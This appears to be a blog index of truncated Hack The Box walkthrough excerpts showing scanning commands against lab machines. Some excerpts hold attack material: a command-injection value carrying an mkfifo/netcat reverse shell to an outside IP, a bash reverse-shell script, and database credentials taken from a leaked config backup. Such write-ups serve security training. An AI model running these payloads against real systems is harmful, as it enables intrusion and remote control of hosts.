Hack The Box – Spectra
ββ(rootπkali)-[/home/kali/Downloads] ββ# nmap -A 10.10.10.229 http://10.10.10.229:8081/ http://10.10.10.229/ http://spectra.htb/main/ http://spectra.htb/testing/index.php http://spectra.htb/testing/ βββ(rootπkali)-[/home/kali/Downloads] ββ# wget http://spectra.htb/testing/wp-config.php.save ‘DB_USER’, ‘devtest’ ‘DB_PASSWORD’, ‘devteam01’ python3 -c...
Hack The Box – Breadcrumbs
http://10.10.10.228/ βββ(rootπkali)-[/home/kali/Downloads/ffuf] ββ# ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://10.10.10.228/FUZZ https://10.10.10.228/php/books.php https://10.10.10.228/php/ https://10.10.10.228/db/ https://10.10.10.228/books/ https://10.10.10.228/portal/login.php Here click on helper https://10.10.10.228/portal/php/admins.php https://10.10.10.228/portal/login.php...
Hack The Box – Ophiuchi
http://10.10.10.227:8080/ βββ(rootπkali)-[/home/kali/Downloads] ββ# echo “10.10.10.227 ophiuchi.htb” >> /etc/hosts βββ(rootπkali)-[/home/kali/Downloads] ββ# git clone https://github.com/artsploit/yaml-payload βββ(rootπkali)-[/home/kali/Downloads/yaml-payload] ββ# cat rev.sh #!/bin/sh bash -i...
Hack The Box – Scriptkiddie
http://10.10.10.226:5000/ exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection python3 -c ‘import pty; pty.spawn(“/bin/bash”)’ User.txt: ebca83b5823fXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX echo “1 2 ;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.46 1234...
Hack The Box – Tentacle
βββ(rootπkali)-[/home/kali/Downloads] ββ# nmap -sV -v -p- –min-rate=10000 10.10.10.224 http://10.10.10.224:3128/ By above we get j.nakazawa@realcorp.htbsrv01.realcorp.htb (squid/4.11) βββ(rootπkali)-[/home/β¦/Downloads/SecLists/Discovery/DNS] ββ# dnsenum –threads 64...
Hack The Box -Armageddon
βββ(rootπkali)-[/home/kali/Downloads] ββ# nmap 10.10.10.233 http://10.10.10.233/ Letβs check if we can work a way around the login page! Exploring, I found...
HackTheBox β BountyHunter
βββ(rootkali)-[/home/kali/Downloads] ββ# nmap -A 10.10.11.100 βββ(rootkali)-[/home/kali/Downloads] ββ# dirb http://10.10.11.100/ http://10.10.11.100/resources/ http://10.10.11.100/resources/README.txt βββ(rootkali)-[/home/kali/Downloads] ββ# dirb http://10.10.11.100/ -X .php http://10.10.11.100/portal.php Since it...
HackTheBox β Static Walkthrough
βββ(rootkali)-[/home/kali/Downloads] ββ# nmap -A 10.10.10.246 http://10.10.10.246:8080/ βββ(rootkali)-[/home/kali/Downloads] ββ# gobuster dir -u http://10.10.10.246:8080/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x .php,txt http://10.10.10.246:8080/robots.txt http://10.10.10.246:8080/vpn/...
HackTheBox β Writer Walkthrough
βββ(rootkali)-[/home/kali/Downloads] ββ# nmap -A -v -T4 -Pn 10.10.11.101 βββ(rootkali)-[/home/kali/Downloads] ββ# echo 10.10.11.101 writer.htb > /etc/hosts http://writer.htb/ βββ(rootkali)-[/home/kali/Downloads] ββ# wfuzz -w...
HackTheBox β Unicode Walkthrough β In English
βββ(rootγΏkali)-[/home/kali/Downloads] ββ# nmap -sV -T4 -Pn 10.10.11.126 http://10.10.11.126/ By searching a bit you can find a lot of forms, file...